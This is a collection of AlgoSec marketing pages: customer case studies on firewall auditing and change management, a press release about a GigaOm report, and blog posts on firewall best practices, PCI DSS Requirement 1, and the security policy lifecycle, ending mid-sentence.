Search results

Explore Algosec's customer success stories to see how organizations worldwide improve security, compliance, and efficiency with our solutions. Discovery Streamlines Firewall Audits And Simplifies The Change Workflow Organization Discovery Industry Financial Services Headquarters Johannesberg, South Africa Download case study Share Customer
success stories "With AlgoSec we can now get, in a click of a button, what took two to three weeks per firewall to produce manually" Background Discovery Limited is a South African-founded financial services organization that operates in the healthcare, life assurance, short-term insurance, savings and investment products and wellness markets. Founded in 1992, Discovery was guided by a clear core purpose — to make people healthier and to enhance and protect their lives. Underpinning this core purpose is the belief that through innovation, Discovery can be a powerful market disruptor. The company, with headquarters in Johannesburg, South Africa, has expanded its operations globally and currently serves over 4.4 million clients across South Africa, the United Kingdom, the United States, China, Singapore and Australia.Operating in the highly regulated insurance and health sectors, Discovery monitors its compliance with international privacy laws and security criteria, includingPCI-DSS globally, Sarbanes-Oxley and HIPAA in the US, the Data Protection Act in the UK, and South Africa’s Protection of Personal Information Act. Challenge During its early years, the company managed its firewalls through an internally developed, legacy system which offered very limited visibility into the change request process.“We grew faster than anyone expected,” says Marc Silver, Security Manager at Discovery. “We needed better visibility into what changes were requested to which firewall, for what business need and also to ensure proper risk analysis.”Discovery’s growth necessitated a rapid increase in the number of firewalls deployed, and the corresponding ruleset sizes. The time required to audit them grew by orders of magnitude, ultimately taking up to three weeks per firewall. The IT Security team of four engineers recognized that it needed a fresh approach to manage risk and ensure compliance. Solution Discovery chose the AlgoSec Security Management Solution to deliver automated, comprehensive firewall operations, risk analysis and change management. Silver states that compared to AlgoSec’s competitors, “AlgoSec has a more tightly integrated change control, and is easier to manage. Another big advantage is how it finds unused rules and recommends rule consolidations,” says Silver.AlgoSec’s integration with Request Tracker (RT) change management system was also important in Discovery’s selection of a security management solution. “We use RT for our internal ticketing system, and the stability of AlgoSec’s integration with RT met our requirements. AlgoSec’s visual workflow is clear, easy to understand and more mature than the others we evaluated,” adds Silver. Results Since implementing AlgoSec, Discovery has found its security audits running more effectively. Discovery relies on AlgoSec’s built-in compliance reports to address Sarbanes-Oxley, HIPAA, PCI-DSS, and other national and international regulatory requirements. “Every year internal auditors would take our entire rulesets for each firewall pair and tell us where we needed to make improvements. AlgoSec now allows us to submit an automated report to our auditing team. It tells them what our security state is, and what needs to be remediated. The total process used to take three months. Now, in a click of a button, we can get what took two to three weeks per firewall to produce manually,” says Silver.Discovery has also found an unexpected advantage: “AlgoSec tells us what rules are in use and what rules are not. For one firewall, we were able to remove 30,000 rules. A firewall with 500,000 rules isn’t going to cope as well as one with 100,000 rules. By optimizing our devices, AlgoSec saves us money in the long term by enabling us to delay upgrading to a larger firewall,” adds Silver.In conclusion, Silver states that “Now we can see what is and isn’t happening in our security system. It has made a much bigger impact than we thought it would. With AlgoSec’s policy optimization, and the time we save on compliance, AlgoSec has given us a much stronger competitive edge than we had six months ago.” Schedule time with one of our experts

AlgoSec leads in automating application connectivity and security policy management, essential for complex hybrid and multi-cloud networks AlgoSec Achieves Outperformer Status in GigaOm’s Cloud Network Security Radar Report AlgoSec leads in automating application connectivity and security policy management, essential for complex hybrid and multi-cloud networks February 15, 2024 Speak to one of our experts RIDGEFIELD PARK, N.J., Feb 15, 2024 – Global cybersecurity leader AlgoSec has been named a Market Outperformer in GigaOm’s first cloud network security Radar Report, recognizing its position at the forefront of Cloud security innovation. The GigaOm Radar report highlights key cloud network security vendors to equip IT decision-makers with the information they need to select the best fit for their business. It measures selected vendors based on their execution and ability to innovate. In the report, Andrew Green, IT writer and practitioner, acknowledged several of AlgoSec’s distinguishing capabilities including Automation and Security Policy Management: “AlgoSec automates application connectivity and security policy across the hybrid network estate including public cloud, private cloud, containers, and on-premises networks.” Comprehensive Solution Suite : “AlgoSec delivers cloud network security solutions via its Firewall Analyzer, FireFlow, and AlgoSec Cloud products. AlgoSec Cloud provides application-based risk identification and security policy management across multi-cloud environments.” Real-Time Network Mapping : “A real-time network map provides a comprehensive view and connectivity flows of security and networking appliances such as firewalls, routers, and switches.” Other highlights from the report include infrastructure as code (IaC) security scanning capability, which produces “what-if” risks and vulnerability analysis scans within existing source control applications, and AlgoBot, an intelligent chatbot that assists with change management processes. Green said: “Network security policy managers have a distinct set of features, with particularly strong observability, misconfiguration, and simulation capabilities. These solutions are less invasive as they orchestrate only existing appliances without imposing architectural changes, and they can help enterprises reach the low-hanging fruit for improving their security posture. AlgoSec offers a range of innovative developments, including AlgoBot, which helps with change management processes, and the solution’s capabilities for planning and simulations.” “We are at the forefront of a pivotal shift within cloud network security”, said Eran Shiff, VP Product at AlgoSec. “To effectively address the needs of businesses working in a complex hybrid world, we are disregarding conventional norms and operating deep within the cloud application level. By understanding the business context and purpose of every application, we are enabling our customers to gain visibility, reduce overall risk and process hundreds of application changes with zero-touch across a hybrid network. Our inclusion in this report is a testament of this evolution and marks a new chapter in securing application connectivity.” AlgoSec is trusted by more than 1,800 of the world’s leading organizations including NCR Corporation, a leading global point-of-sale (POS) provider for restaurants, retailers, and banks and a provider of multi-vendor ATM software. Commenting on the partnership, Scott Theriault, Global Manager, Network Perimeter Security at NCR said: “As we aspire to achieve zero-trust, when moving into the cloud, micro-segmentation and container security come into play. Therefore, we need tools like AlgoSec to assist us in the journey because most application owners do not know what access is needed. This tool helps them learn what needs to be implemented to reduce the attack surface,” stated Theriault. About AlgoSec AlgoSec, a global cybersecurity leader, empowers organizations to secure application connectivity and cloud-native applications throughout their multi-cloud and hybrid network. Trusted by more than 1,800 of the world’s leading organizations, AlgoSec’s application-centric approach enables to securely accelerate business application deployment by centrally managing application connectivity and security policies across the public clouds, private clouds, containers, and on-premises networks. Using its unique vendor-agnostic deep algorithm for intelligent change management automation, AlgoSec enables acceleration of digital transformation projects, helps prevent business application downtime and substantially reduces manual work and exposure to security risks. AlgoSec’s policy management and CNAPP platforms provide a single source for visibility into security and compliance issues within cloud-native applications as well as across the hybrid network environment, to ensure ongoing adherence to internet security standards, industry, and internal regulations. Learn how AlgoSec enables application owners, information security experts, DevSecOps and cloud security teams to deploy business applications up to 10 times faster while maintaining security at www.algosec.com . About GigaOm GigaOm provides technical, operational, and business advice for strategic digital enterprise and business initiatives. Enterprise business leaders, CIOs, and technology organizations partner with GigaOm for practical, actionable, strategic, and visionary advice for modernizing and transforming their business. GigaOm’s advice empowers enterprises to successfully compete in an increasingly complicated business atmosphere that requires a solid understanding of constantly changing customer demands. GigaOm works directly with enterprises both inside and outside of the IT organization to apply proven research and methodologies designed to avoid pitfalls and roadblocks while balancing risk and innovation. Research methodologies include but are not limited to adoption and benchmarking surveys, use cases, interviews, ROI/TCO, market landscapes, strategic trends, and technical benchmarks. Our analysts possess 20+ years of experience advising a spectrum of clients from early adopters to mainstream enterprises. GigaOm’s perspective is that of the unbiased enterprise practitioner. Through this perspective, GigaOm connects with engaged and loyal subscribers on a deep and meaningful level.

Explore Algosec's customer success stories to see how organizations worldwide improve security, compliance, and efficiency with our solutions. Leading Life Insurance Company Ensures Security and Compliance Organization Life Insurance Industry Financial Services Headquarters Texas, USA Download case study Share Customer
success stories "AlgoSec worked right out of the box. We got started quickly and never looked back.” A leading insurance provider of life, disability and other benefits for individuals increases efficiency and ensures continuous compliance on their networks. Background This life insurance company provides insurance and wealth-management products and services to millions of Americans. The company employs thousands of people and maintains a network of several thousand financial representatives. They offer a wide range of insurance products and services that include life insurance, disability income insurance, annuities, investments, dental and vision. Challenges For decades, the company operated a large and growing data center in Bethlehem, PA which they recently transferred to Dallas, TX. During and since the transfer, the company has been replacing much of its multi-vendor network infrastructure, consolidating on Cisco Firepower technology, but still maintaining vestiges of other routers, firewalls and network equipment. At the new data center, the company’s IT staff maintains more than 100 firewalls that host some 10,000 rules. The company’s network security engineer described the considerable pressure on the security staff: “Change requests are frequent, 25-30 per week, demanding considerable time and effort by the security team.” Due to the presence of firewalls from multiple vendors, change requests were analyzed manually and pushed to devices with great care so as not to interrupt the operation of a rapidly growing body of applications. “The change–request process was tedious and very time consuming,” declared the engineer. “as was the pressure to maintain a strong compliance posture at all times.” The company is subject to a litany of demanding insurance-industry regulations that concern the care of personal information and processes. Managing risk is critical to the success of the business and being able to ascertain compliance with regulations is always vital. Solution The security team turned to AlgoSec to help them manage network security policy across the large data center that includes firewalls from multiple vendors. After a careful review, the security team acquired AlgoSec’s Firewall Analyzer to speed up the process of firewall change management as well as to continuously quantify the degree of compliance and level of risk. Vendor-agnostic AlgoSec Firewall Analyzer delivers visibility and analysis of complex network security policies across on–premise and cloud networks. It automates and simplifies security operations including troubleshooting, auditing and risk analysis. Firewall Analyzer optimizes the configuration of firewalls, routers, web proxies and related network infrastructure to ensure security and compliance. Results After a very short installation and learning period, the security staff became proficient at operating Firewall Analyzer’s helpful capabilities. Soon thereafter, staff members undertook AlgoSec certification courses to become experts in using the solution for firewall analysis. “AlgoSec worked right out of the box,” said the engineer. “We got started quickly and never looked back.” The AlgoSec solution has significantly improved processes, delivering significantly improved results for their security team: Reduced time to analyze and optimize firewall rules, automatically checking for shadow rules and discovering other rules eligible for consolidation or deletion. Continual optimization of firewall rules across their entire network estate. Increased efficiency of security staff, enabling them to keep up with the volume of change requests. Accelerated and more accurate change verification. Audit-readiness, generating scheduled and on-demand compliance reports. The security staff looks forward to implementing AlgoSec FireFlow (AFF), that will enable them to push changes automatically to their population of firewalls, eliminating errors and further reducing risk. With AFF, the staff will be able to respond to changing business requirements with increased speed and agility. They added: “We are also checking out AlgoSec’s new cloud-security solution since we are migrating a growing number of applications to AWS.” Schedule time with one of our experts

Explore Algosec's customer success stories to see how organizations worldwide improve security, compliance, and efficiency with our solutions. Australia’s Leading Superannuation Provider Organization Retirement fund Industry Financial Services Headquarters Australia Download case study Share Customer
success stories "It’s very easy to let security get left behind. We want to make sure that security is not a roadblock to business performance,” said Bryce. “We need to be agile and we need to make sure we can deploy systems to better support our members. Automation can really help you see that return-on-investment." Network Security Policy Automation helps Superannuation company reduce costs to provide higher returns to members Background The company is one of Australia’s leading superannuation (pension) providers. Their job is to protect their client’s money, information, and offer long-term financial security. Challenges The company’s firewalls were managed by a Managed Service Security Provider (MSSP) and there had not been enough insight and analysis into their network over the years, leading to a bloated and redundant network infrastructure. Firewalls and infrastructure did not get the care and attention they needed. As a result, some of their challenges included: Legacy firewalls that had not been adequately maintained Difficulty identifying and quantifying network risk Lack of oversight and analysis of the changes made by their Managed Services Security Provider (MSSP) Change requests for functionality that was already covered by existing rules The Solution The customer was searching for a solution that provided: A strong local presence Repeatable and recordable change management processes As a result, the customer implemented AlgoSec. The client selected AlgoSec’s Security Policy Management Solution, which includes AlgoSec Firewall Analyzer and AlgoSec FireFlow. AlgoSec Firewall Analyzer delivers visibility and analysis of complex network security policies across on-premise, cloud, and hybrid networks. It automates and simplifies security operations including troubleshooting, auditing, and risk analysis. Using Firewall Analyzer, they can optimize the configuration of firewalls, and network infrastructure to ensure security and compliance. AlgoSec FireFlow enables security staff to automate the entire security policy change process from design and submission to proactive risk analysis, implementation, validation, and auditing. Its intelligent, automated workflows save time and improve security by eliminating manual errors and reducing risk. The Results “Straight away, we were able to see a return-on-investment,” said Stefan Bryce, Security Manager, a leading Australian superannuation provider. By using the AlgoSec Security Management Solution, the customer gained: Greater insight and oversight into their firewalls and other network devices Identification of risky rules and other holes in their network security policy. Easier cleanup process due to greater visibility Audits and accountability into their network security policy changes. They were able to ensure ongoing compliance and make sure that rules submitted did not introduce additional risk Identification and elimination of duplicate rules Faster implementation of policy changes Business agility and innovation because employees are better motivated to make changes due to seamless policy change process. Consolidation of their virtual firewall internal infrastructure Reduced ongoing costs to their MSSP Schedule time with one of our experts

If your firewall shows a notification that it has detected a new network, it means it is doing one of its fundamental jobs properly. But... Firewall Change Management Firewall has detected a new network Tsippi Dach 2 min read Tsippi Dach Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 8/9/23 Published If your firewall shows a notification that it has detected a new network, it means it is doing one of its fundamental jobs properly. But good network security does not stop with just detecting a new network. You will have to analyze the network location, ensure it is authorized to connect with your network, automate this process, and ensure full-on monitoring so that none of the intrusive attempts ever go unnoticed. A good amount of all these tasks can be made more efficient, accurate, and automated with the help of strong network security solutions. What should you do if your firewall has detected an unrecognized network? 1. Analyze the incoming network request If the process is not automated, you might have to check for the incoming network request’s trustworthiness manually. You can check the security certificates associated with the request, check its source, validate with the right information whether this source can be trusted, and then decide whether to allow access. The best way to deal with any new network detection is to automate the authorization by using a strong network security policy that outlines what sources can be trusted, what cannot be trusted, and which decisions require further approval. 2. Analyze your network for any impact In case of an untrusted new network detection and possible intrusion, you should be able to check the impact or effect it has had on your current assets. You should analyze the entire system for performance, feature validation, and asset availability. A quick way to do this would be to use any network visualization product, such as Firewall Analyzer . This tool can also assess how your overall home network will be impacted by any possible security policy 3. Reassess your security policies and improve them In the event of any security incident, you will have to isolate your network, mitigate any impact caused by the intrusion and reset the system to a healthy state. And most importantly, you will have to investigate the incident, figure out the root cause, and fix it. This would require updating your security policies, risk management, and local network security settings. Following up on any security incident is highly recommended so that no unauthorized intrusion attempts go unnoticed and are handled appropriately. And like any other seemingly enormous task, this can be automated too. Check out firewall change management tools to help you implement continuous improvement within your network security management, contributing to network protection. How to setup strong firewall protection Here are some security measures and troubleshooting tips you need to employ to strengthen your Microsoft firewall management and network security. 1. Establish a strong network security policy management To implement a strong network security management framework, you must design the security policies, systems, and solutions as per your operating system. A network security policy framework can help you guide and streamline the security design and guide you with the enforcement of the same. As with any process, policy management should also be a continuously evolving framework and must be managed well to facilitate all the relevant tasks. Use intelligent systems like Algosec’s Algobot to help your firewall admins to carry out their tasks efficiently. And if you are looking to automate the security policy management tasks, you can also check out Fireflow . It helps you automate the security policy change process across the many phases of policy management, from planning to implementation and validation. 2. Visualize the network data Network monitoring is critical to enabling t strong firewall While AI-based alerting and monitoring systems could greatly help automate intrusion detection and notification, certain tasks require human supervision and deep analysis of the network logs. This way, you can not only analyze the network for any intrusion attempts (whether it be through malware sent through a web browser, file sharing, router, ethernet network adapter, or wi-fi) but also get to have a good understanding of your traffic and business trends. Appviz Firewall Analyzer from Algosec is a helpful tool for achieving this functionality. 3. Optimize your firewall configuration Firewall configurations include a broad range of activities that range from designing your firewall solution and choosing the right software/hardware to setting up the firewall rules and management processes. Set these configurations early on with all necessary considerations regarding your environment and applications. This process should also include the overall policy configurations and security rules that define the change process, firewall administration, monitoring, and management operations. Read this resourceful guide to learn more about firewall configuration, its challenges, and guidance on implementation. 4. Ensure cloud compliance Compliance and security go hand in hand in protecting your assets and boosting the overall goodwill and trust associated with your brand. Cloud compliance frameworks provide guidelines and cover most of the pain points of managing cloud security. Staying compliant with these guidelines means that your security is up to date and can be considered on par with the high standards set by these frameworks. 5. Micro-segmentation Micro-segmentation is a domain network security technique that helps you implement flexible security measures for individually segmented data center parts. It is most helpful with protecting your virtual machine implementations as it allows you to deploy specific security measures crafted to fit each virtual machine’s requirements. With security deployed on segmented workloads, your network becomes more resilient to attacks. 6. Perform regular firewall audits To ensure continuous compliance, you must conduct regular audit checks on the status of your firewall settings, policies, and implementations. Gather all the related documents and key information, review your current processes, firewall mechanisms, perform penetration tests, assess the security measures, and optimize as required. Perform a complete risk assessment on your Windows server and fix any issues that might be discovered as part of the audit process. Tips and best practices for enhanced network security 1. Firewall for native cloud applications Make use of cloud-first prioritized firewall solutions to protect your native cloud applications. You need comprehensive visibility on all your cloud assets, ensuring advanced threat detection and protection. This requires a whole set of tools and security applications working together to provide a centralized security system. You will also have to ensure data compliance at all levels as well. You can try to employ native cloud solutions such as the extensive tools provided by Algosec. 2. Use centralized solutions Make use of centralized solutions to manage hybrid and multi-cloud applications so that you have all the important information accessible from a single platform. AlgoSec Cloud from Algosec is an amazing solution to achieve centralized visibility across hybrid and multi-cloud accounts and assets. 3. Follow the best security practices and guidelines Look into the best security practices and guidelines put forth by your cloud vendor and follow them to get the best out of the collective knowledge. You can also use vendor-specific firewall management solutions to help you deal with issues related to specific cloud accounts you might be using. Additionally, having an antivirus like Windows Defender and using a VPN also helps. A good practice to follow in case of uncertainty is to block by default. Any new network or source must be blocked unless specifically permitted by the user. Regarding access privileges, you can follow the principle of least privilege, where users are only granted as many privileges as would be required for their specific roles and responsibilities. Use audit tools for regular auditing and keep improving on any vulnerabilities your firewall may have. To increase the performance of your firewall applications, you can look into how you have set up your firewall rules and optimize them for better performance. Here are some more best practices you can follow when setting up your firewall rules: Document all your rules and firewall configurations across all the devices. Make sure to document every new rule created and keep your documentation up to date. This can help security admins review the rules and optimize them as and when necessary. As mentioned earlier, follow a zero trust policy where you block traffic by default and permit network access only on a need basis. Monitor your firewall logs even when there is no particular security incident to investigate. Regular monitoring and analysis will give you a better understanding of your network traffic and can help you identify suspicious activities early on. Group the firewall rules to boost performance and avoid complications and loopholes. You can hire expert security administrators and security solutions such as Algosec to help review your firewall rules and keep them updated. Firewall management FAQs What can a firewall do? A Windows firewall can be interpreted as similar to a literal wall. It blocks unwanted access to your system and lets you decide whether or not to allow any new network connection or access request. Similar to how a fort works, you only give access to access requests that you trust and block the rest. It is the first defensive setup you can set up for your network security. You can set a list of trusted sources, and the requests from these sources will be given automated access. The rest of the access requests from any other source, be it a third-party network, mobile devices, internet connection, or any other endpoint, can be blocked by your firewall. You can set up firewall rules that dictate which type of requests and sources can be trusted. A firewall can be implemented by using multiple methods. It can be a cloud app, hardware, software, virtualizations, an access-restricted private cloud, and more. A typical firewall ruleset consists of the following specifications: Source address Source port Destination address Destination port Information on whether to block or permit the traffic to the respective address and port criteria. A firewall can be implemented by using multiple methods. It can be a cloud app, hardware, software, virtualizations, an access-restricted private cloud, and more. How does a firewall protect businesses from cyberthreats? The obvious main use of the firewall is to restrict all kinds of unauthorized access, thus protecting your systems from cyberattacks. But it also has several other benefits, such as: Providing data privacy so your work network traffic is guarded from outside public networks. Restricting content access to your private network For instance, educational institutions can block inappropriate sites for their students while in class. Blocking unwanted traffic from ads, spam, and gaming sites. Ensuring data confidentiality and keeping you compliant with security standards. Monitoring all your incoming traffic, helping you analyze your network profile, and helping you gain insights into trending user behavior. Filtering out unwanted traffic and restricting access to certain websites. Providing secure remote access through VPNs and similar remote access mechanisms. What are the most common types of firewalls? Based on the way data is filtered through a firewall, it can be broadly classified into one of the following types: Packet filtering Stateful inspection firewalls Circuit-level gateway firewalls Proxy firewalls Next-generation firewalls (NGFWs) Threat focused NGFWs Virtual firewalls Cloud-native firewalls Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

So we’ve made it to the last part of our blog series on PCI 3.0 Requirement 1. The first two posts covered Requirement 1.1... Auditing and Compliance Avoid the Traps: What You Need to Know About PCI Requirement 1 (Part 3) Matthew Pascucci 2 min read Matthew Pascucci Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 9/9/14 Published So we’ve made it to the last part of our blog series on PCI 3.0 Requirement 1. The first two posts covered Requirement 1.1 (appropriate firewall and router configurations) and 1.2 (restrict connections between untrusted networks and any system components in the cardholder data environment) and in this final post we’ll discuss key requirements of Requirements 1.3 -1.5 and I’ll again give you my insight to help you understand the implications of these requirements and how to comply with them. Implement a DMZ to limit inbound traffic to only system components that provide authorized publicly accessible services, protocols, and ports (1.3.1.): The DMZ is used to publish services such as HTTP and HTTPS to the internet and allow external entities to access these services. But the key point here is that you don’t need to open every port on the DMZ. This requirement verifies that a company has a DMZ implemented and that inbound activity is limited to only the required protocols and ports. Limit inbound Internet traffic to IP addresses within the DMZ (1.3.2): This is a similar requirement to 1.3.1, however instead of looking for protocols, the requirement focuses on the IPs that the protocol is able to access. In this case, just because you might need HTTP open to a web server, doesn’t mean that all systems should have external port 80 open to inbound traffic. Do not allow any direct connections inbound or outbound for traffic between the Internet and the cardholder data environment (1.3.3): This requirement verifies that there isn’t unfiltered access, either going into the CDE or leaving it, which means that all traffic that traverses this network must pass through a firewall. All unwanted traffic should be blocked and all allowed traffic should be permitted based on an explicit source/destination/protocol. There should never be a time that someone can enter or leave the CDE without first being inspected by a firewall of some type. Implement anti-spoofing measures to detect and block forged source IP addresses from entering the network (1.3.4): In an attempt to bypass your firewall, cyber attackers will try and spoof packets using the internal IP range of your network to make it look like the request originated internally. Enabling the IP spoofing feature on your firewall will help prevent these types of attacks. Do not allow unauthorized outbound traffic from the cardholder data environment to the Internet (1.3.5): Similar to 1.3.3, this requirement assumes that you don’t have direct outbound access to the internet without a firewall. However in the event that a system has filtered egress access to the internet the QSA will want to understand why this access is needed, and whether there are controls in place to ensure that sensitive data cannot be transmitted outbound. Implement stateful inspection, also known as dynamic packet filtering (1.3.6): If you’re running a modern firewall this feature is most likely already configured by default. With stateful inspection, the firewall maintains a state table which includes all the connections that traverse the firewall, and it knows if there’s a valid response from the current connection. It is used to stop attackers from trying to trick a firewall into initiating a request that didn’t previously exist. Place system components that store cardholder data (such as a database) in an internal network zone, segregated from the DMZ and other untrusted networks (1.3.7): Attackers are looking for your card holder database. Therefore, it shouldn’t be stored within the DMZ. The DMZ should be considered an untrusted network and segregated from the rest of the network. By having the database on the internal network provides another layer of protection against unwanted access. [Also see my suggestions for designing and securing you DMZ in my previous blog series: The Ideal Network Security Perimeter Design: Examining the DMZ Do not disclose private IP addresses and routing information to unauthorized parties (1.3.8): There should be methods in place to prevent your internal IP address scheme from being leaked outside your company. Attackers are looking for any information on how to breach your network, and giving them your internal address scheme is just one less thing they need to learn. You can stop this by using NAT, proxy servers, etc. to limit what can be seen from the outside. Install personal firewall software on any mobile and/or employee-owned devices that connect to the Internet when outside the network (for example, laptops used by employees), and which are also used to access the network (1.4): Mobile devices, such as laptops, that can connect to both the internal network and externally, should have a personal firewall configured with rules that prevent malicious software or attackers from communicating with the device. These firewalls need to be configured so that their rulebase can never be stopped or changed by anyone other than an administrator. Ensure that security policies and operational procedures for managing firewalls are documented, in use, and known to all affected parties (1.5): There needs to be a unified policy regarding firewall maintenance including how maintenance procedures are performed, who has access to the firewall and when maintenance is scheduled. Well, that’s it! Hopefully, my posts have given you a better insight into what is actually required in Requirement 1 and what you need to do to comply with it. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

Information security is vital to business continuity. Organizations trust their IT teams to enable innovation and business transformation... Risk Management and Vulnerabilities How to optimize the security policy management lifecycle Tsippi Dach 2 min read Tsippi Dach Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 8/9/23 Published Information security is vital to business continuity. Organizations trust their IT teams to enable innovation and business transformation but need them to safeguard digital assets in the process. This leads some leaders to feel that their information security policies are standing in the way of innovation and business agility. Instead of rolling new a new enterprise application and provisioning it for full connectivity from the start, security teams demand weeks or months of time to secure those systems before they’re ready. But this doesn’t mean that cybersecurity is a bottleneck to business agility. The need for speedier deployment doesn’t automatically translate to increased risk. Organizations that manage application connectivity and network security policies using a structured lifecycle approach can improve security without compromising deployment speed. Many challenges stand between organizations and their application and network connectivity goals. Understanding each stage of the lifecycle approach to security policy change management is key to overcoming these obstacles. Challenges to optimizing security policy management ` Complex enterprise infrastructure and compliance requirements A medium-sizded enterprise may have hundreds of servers, systems, and security solutions like firewalls in place. These may be spread across several different cloud providers, with additional inputs from SaaS vendors and other third-party partners. Add in strict regulatory compliance requirements like HIPAA , and the risk management picture gets much more complicated. Even voluntary frameworks like NIST heavily impact an organization’s information security posture, acceptable use policies, and more – without the added risk of non-compliance. Before organizations can optimize their approach to security policy management, they must have visibility and control over an increasingly complex landscape. Without this, making meaningful progress of data classification and retention policies is difficult, if not impossible. Modern workflows involve non-stop change When information technology teams deploy or modify an application, it’s in response to an identified business need. When those deployments get delayed, there is a real business impact. IT departments now need to implement security measures earlier, faster, and more comprehensively than they used to. They must conduct risk assessments and security training processes within ever-smaller timeframes, or risk exposing the organization to vulnerabilities and security breaches . Strong security policies need thousands of custom rules There is no one-size-fits-all solution for managing access control and data protection at the application level. Different organizations have different security postures and security risk profiles. Compliance requirements can change, leading to new security requirements that demand implementation. Enterprise organizations that handle sensitive data and adhere to strict compliance rules must severely restrict access to information systems. It’s not easy to achieve PCI DSS compliance or adhere to GDPR security standards solely through automation – at least, not without a dedicated change management platform like AlgoSec . Effectively managing an enormous volume of custom security rules and authentication policies requires access to scalable security resources under a centralized, well-managed security program. Organizations must ensure their security teams are equipped to enforce data security policies successfully. Inter-department communication needs improvement Application deliver managers, network architects, security professionals, and compliance managers must all contribute to the delivery of new application projects. Achieving clear channels of communication between these different groups is no easy task. In most enterprise environments, these teams speak different technical languages. They draw their data from internally siloed sources, and rarely share comprehensive documentation with one another. In many cases, one or more of these groups are only brought in after everyone else has had their say, which significantly limits the amount of influence they can have. The lifecycle approach to managing IT security policies can help establish a standardized set of security controls that everyone follows. However, it also requires better communication and security awareness from stakeholders throughout the organization. The policy management lifecycle addresses these challenges in five stages ` Without a clear security policy management lifecycle in place, most enterprises end up managing security changes on an ad hoc basis. This puts them at a disadvantage, especially when security resources are stretched thin on incident response and disaster recovery initiatives. Instead of adopting a reactive approach that delays application releases and reduces productivity, organizations can leverage the lifecycle approach to security policy management to address vulnerabilities early in the application development lifecycle. This leaves additional resources available for responding to security incidents, managing security threats, and proactively preventing data breaches. Discover and visualize application connectivity The first stage of the security policy management lifecycle revolves around mapping how your apps connect to each other and to your network setup. The more details can include in this map, the better prepared your IT team will be for handling the challenges of policy management. Performing this discovery process manually can cost enterprise-level security teams a great deal of time and accuracy. There may be thousands of devices on the network, with a complex web of connections between them. Any errors that enter the framework at this stage will be amplified through the later stages – it’s important to get things right at this stage. Automated tools help IT staff improve the speed and accuracy of the discovery and visualization stage. This helps everyone – technical and nontechnical staff included – to understand what apps need to connect and work together properly. Automated tools help translate these needs into language that the rest of the organization can understand, reducing the risk of misconfiguration down the line. Plan and assess security policy changes Once you have a good understanding of how your apps connect with each other and your network setup, you can plan changes more effectively. You want to make sure these changes will allow the organization’s apps to connect with one another and work together without increasing security risks. It’s important to adopt a vulnerability-oriented perspective at this stage. You don’t want to accidentally introduce weak spots that hackers can exploit, or establish policies that are too complex for your organization’s employees to follow. This process usually involves translating application connectivity requests into network operations terms. Your IT team will have to check if the proposed changes are necessary, and predict what the results of implementing those changes might be. This is especially important for cloud-based apps that may change quickly and unpredictably. At the same time, security teams must evaluate the risks and determine whether the changes are compliant with security policy. Automating these tasks as part of a regular cycle ensures the data is always relevant and saves valuable time. Migrate and deploy changes efficiently The process of deploying new security rules is complex, time-consuming, and prone to error . It often stretches the capabilities of security teams that already have a wide range of operational security issues to address at any given time. In between managing incident response and regulatory compliance, they must now also manually update thousands of security rules over a fleet of complex network assets. This process gets a little bit easier when guided by a comprehensive security policy change management framework. But most organizations don’t unlock the true value of the security policy management lifecycle until they adopt automation. Automated security policy management platforms enable organizations to design rule changes intelligently, migrate rules automatically, and push new policies to firewalls through a zero-touch interface. They can even validate whether the intended changes updated correctly. This final step is especially important. Without it, security teams must manually verify whether their new policies successfully address the vulnerabilities the way they’re supposed to. This doesn’t always happen, leaving security teams with a false sense of security. Maintain configurations using templates Most firewalls accumulate thousands of rules as security teams update them against new threats. Many of these rules become outdated and obsolete over time, but remain in place nonetheless. This adds a great deal of complexity to small-scale tasks like change management, troubleshooting issues, and compliance auditing. It can also impact the performance of firewall hardware , which decreases the overall lifespan of expensive physical equipment. Configuration changes and maintenance should include processes for identifying and eliminating rules that are redundant, misconfigured, or obsolete. The cleaner and better-documented the organization’s rulesets are, the easier subsequent configuration changes will be. Rule templates provide a simple solution to this problem. Organizations that create and maintain comprehensive templates for their current firewall rulesets can easily modify, update, and change those rules without having to painstakingly review and update individual devices manually. Decommission obsolete applications completely Every business application will eventually reach the end of its lifecycle. However, many organizations keep decommissioned security policies in place for one of two reasons: Oversight that stems from unstandardized or poorly documented processes, or; Fear that removing policies will negatively impact other, active applications. As these obsolete security policies pile up, they force the organization to spend more time and resources updating their firewall rulesets. This adds bloat to firewall security processes, and increases the risk of misconfigurations that can lead to cyber attacks. A standardized, lifecycle-centric approach to security policy management makes space for the structured decommissioning of obsolete applications and the rules that apply to them. This improves change management and ensures the organization’s security posture is optimally suited for later changes. At the same time, it provides comprehensive visibility that reduces oversight risks and gives security teams fewer unknowns to fear when decommissioning obsolete applications. Many organizations believe that Security stands in the way of the business – particularly when it comes to changing or provisioning connectivity for applications. It can take weeks, or even months to ensure that all the servers, devices, and network segments that support the application can communicate with each other while blocking access to hackers and unauthorized users. It’s a complex and intricate process. This is because, for every single application update or change, Networking and Security teams need to understand how it will affect the information flows between the various firewalls and servers the application relies on, and then change connectivity rules and security policies to ensure that only legitimate traffic is allowed, without creating security gaps or compliance violations. As a result, many enterprises manage security changes on an ad-hoc basis: they move quickly to address the immediate needs of high-profile applications or to resolve critical threats, but have little time left over to maintain network maps, document security policies, or analyze the impact of rule changes on applications. This reactive approach delays application releases, can cause outages and lost productivity, increases the risk of security breaches and puts the brakes on business agility. But it doesn’t have to be this 